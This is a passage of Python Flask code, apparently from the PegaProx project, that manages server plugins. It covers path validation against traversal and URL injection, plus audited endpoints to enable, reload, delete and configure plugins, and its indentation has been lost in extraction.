# Reject anything else: external URLs, protocol-relative, absolute
# paths to other plugins, leading slash, control chars, query/fragment.
# NS May 2026 (pentest follow-up) — additionally reject anything with
# control chars (CRLF/null/tab), URL semantics (?, #, %, \), or
# parent-segment traversal (..). These would otherwise land verbatim
# in the iframe src and could enable URL/header injection downstream.
def _is_safe_relative_path(s):
if not s or not isinstance(s, str): return False
if any(ord(c) < 0x20 or ord(c) == 0x7f for c in s): return False
for bad in ('?', '#', '%', '\\', '*', ':', ' ', '\t'):
if bad in s: return False
for seg in s.split('/'):
if not seg or seg in ('..', '.'): return False
if not _SAFE_PATH_SEG.match(seg): return False
return True
if has_frontend and isinstance(raw_route, str):
expected_prefix = f'/api/plugins/{pid}/'
if raw_route.startswith(expected_prefix):
tail = raw_route[len(expected_prefix):]
if _is_safe_relative_path(tail):
frontend_route = raw_route
else:
has_frontend = False
elif raw_route and _is_safe_relative_path(raw_route):
# 'ui' → /api/plugins/<pid>/api/ui — matches register_plugin_route()
frontend_route = f'/api/plugins/{pid}/api/{raw_route}'
else:
has_frontend = False
else:
# non-string routes (number, dict, list, None) → drop entirely
has_frontend = False
result.append({
'id': pid,
'name': plugin.get('name', pid),
'version': plugin.get('version', ''),
'author': plugin.get('author', ''),
'description': plugin.get('description', ''),
'enabled': bool(state.get('enabled', 0)),
'loaded': pid in loaded_snapshot,
'error': state.get('error', '') or plugin.get('error', ''),
'has_init': plugin.get('_has_init', False),
'routes': routes_snapshot.get(pid, []),
'trusted': plugin.get('author', '').startswith('PegaProx'),
'has_frontend': has_frontend,
'frontend_route': frontend_route,
})
return jsonify(result)
@bp.route('/api/plugins/<plugin_id>/reload', methods=['POST'])
@require_auth(perms=['plugins.manage'])
def reload_plugin(plugin_id):
"""Force-reload a plugin (unload + load). Helps when a plugin crashed
and the user wants to retry without a full server restart."""
if not _valid_plugin_id(plugin_id):
return jsonify({'error': 'Invalid plugin id'}), 400
plugins_path = Path(PLUGINS_DIR) / plugin_id
if not plugins_path.exists() or not (plugins_path / 'manifest.json').exists():
return jsonify({'error': 'Plugin not found'}), 404
unload_plugin(plugin_id)
ok, err = load_plugin(current_app._get_current_object(), plugin_id)
_set_plugin_state(plugin_id, True, error=err)
usr = getattr(request, 'session', {}).get('user', 'system')
log_audit(usr, 'plugins.reloaded', f"Reloaded plugin: {plugin_id}")
if ok:
mod = _loaded_plugins.get(plugin_id)
if mod and hasattr(mod, 'start_background_tasks'):
try: mod.start_background_tasks()
except Exception: pass
return jsonify({'success': True})
return jsonify({'success': False, 'error': err}), 500
@bp.route('/api/plugins/<plugin_id>/enable', methods=['POST'])
@require_auth(perms=['plugins.manage'])
def enable_plugin(plugin_id):
"""Enable and load a plugin at runtime"""
if not _valid_plugin_id(plugin_id):
return jsonify({'error': 'Invalid plugin id'}), 400
plugins_path = Path(PLUGINS_DIR) / plugin_id
if not plugins_path.exists() or not (plugins_path / 'manifest.json').exists():
return jsonify({'error': 'Plugin not found'}), 404
# load at runtime — no blueprint needed, uses catch-all route
ok, err = load_plugin(current_app._get_current_object(), plugin_id)
_set_plugin_state(plugin_id, True, error=err)
usr = getattr(request, 'session', {}).get('user', 'system')
log_audit(usr, 'plugins.enabled', f"Enabled plugin: {plugin_id}")
if ok:
# start background tasks
mod = _loaded_plugins.get(plugin_id)
if mod and hasattr(mod, 'start_background_tasks'):
try:
mod.start_background_tasks()
except Exception:
pass
return jsonify({'success': True, 'message': f'Plugin {plugin_id} enabled and loaded.'})
else:
return jsonify({'success': False, 'error': err}), 500
@bp.route('/api/plugins/<plugin_id>/disable', methods=['POST'])
@require_auth(perms=['plugins.manage'])
def disable_plugin(plugin_id):
"""Disable and unload a plugin"""
if not _valid_plugin_id(plugin_id):
return jsonify({'error': 'Invalid plugin id'}), 400
unload_plugin(plugin_id)
_set_plugin_state(plugin_id, False)
usr = getattr(request, 'session', {}).get('user', 'system')
log_audit(usr, 'plugins.disabled', f"Disabled plugin: {plugin_id}")
return jsonify({'success': True, 'message': f'Plugin {plugin_id} disabled.'})
@bp.route('/api/plugins/rescan', methods=['POST'])
@require_auth(perms=['plugins.manage'])
def rescan_plugins():
"""Rescan plugins/ directory for new or removed plugins"""
discovered = _discover_plugins()
usr = getattr(request, 'session', {}).get('user', 'system')
log_audit(usr, 'plugins.rescan', f"Rescanned plugins directory: {len(discovered)} found")
return jsonify({'success': True, 'count': len(discovered), 'message': f'{len(discovered)} plugin(s) found.'})
@bp.route('/api/plugins/<plugin_id>', methods=['DELETE'])
@require_auth(perms=['plugins.manage'])
def delete_plugin(plugin_id):
"""Unload, remove state, and delete plugin from disk"""
if not _valid_plugin_id(plugin_id):
return jsonify({'error': 'Invalid plugin id'}), 400
import shutil
plugins_path = Path(PLUGINS_DIR) / plugin_id
if not plugins_path.exists():
return jsonify({'error': 'Plugin not found'}), 404
# unload if loaded
unload_plugin(plugin_id)
# remove DB state
db = get_db()
db.execute('DELETE FROM plugin_state WHERE plugin_id = ?', (plugin_id,))
# delete from disk
try:
shutil.rmtree(str(plugins_path))
except Exception as e:
return jsonify({'error': f'Failed to delete plugin files: {e}'}), 500
usr = getattr(request, 'session', {}).get('user', 'system')
log_audit(usr, 'plugins.deleted', f"Deleted plugin: {plugin_id}")
return jsonify({'success': True, 'message': f'Plugin {plugin_id} deleted.'})
def _safe_plugin_path(plugin_id, filename='config.json'):
"""Validate plugin_id and return safe path — prevents path traversal"""
if '..' in plugin_id or '/' in plugin_id or '\\' in plugin_id:
return None
resolved = (Path(PLUGINS_DIR) / plugin_id / filename).resolve()
if not str(resolved).startswith(str(Path(PLUGINS_DIR).resolve())):
return None
return resolved
@bp.route('/api/plugins/<plugin_id>/config', methods=['GET'])
@require_auth(perms=['plugins.manage'])
def get_plugin_config(plugin_id):
"""Read plugin config.json as raw text"""
if not _valid_plugin_id(plugin_id):
return jsonify({'error': 'Invalid plugin id'}), 400
config_path = _safe_plugin_path(plugin_id)
if not config_path:
return jsonify({'error': 'Invalid plugin ID'}), 400
if not config_path.exists():
return jsonify({'error': 'No config.json found for this plugin'}), 404
try:
return jsonify({'config': config_path.read_text(encoding='utf-8')})
except Exception as e:
return jsonify({'error': safe_error(e)}), 500
@bp.route('/api/plugins/<plugin_id>/config', methods=['PUT'])
@require_auth(perms=['plugins.manage'])
def save_plugin_config(plugin_id):
"""Write plugin config.json — validates JSON before saving"""
if not _valid_plugin_id(plugin_id):
return jsonify({'error': 'Invalid plugin id'}), 400
config_path = _safe_plugin_path(plugin_id)
if not config_path:
return jsonify({'error': 'Invalid plugin ID'}), 400
if not config_path.parent.exists():
return jsonify({'error': 'Plugin not found'}), 404
data = request.get_json() or {}
raw = data.get('config', '')
if not raw:
return jsonify({'error': 'Empty config'}), 400
# validate JSON
try:
json.loads(raw)
except json.JSONDecodeError as e:
return jsonify({'error': f'Invalid JSON: {e}'}), 400
try:
config_path.write_text(raw, encoding='utf-8')
except Exception as e:
return jsonify({'error': f'Failed to write: {e}'}), 500
usr = getattr(request, 'session', {}).get('user', 'system')
log_audit(usr, 'plugins.config_saved', f"Updated config for plugin: {plugin_id}")
return jsonify({'success': True})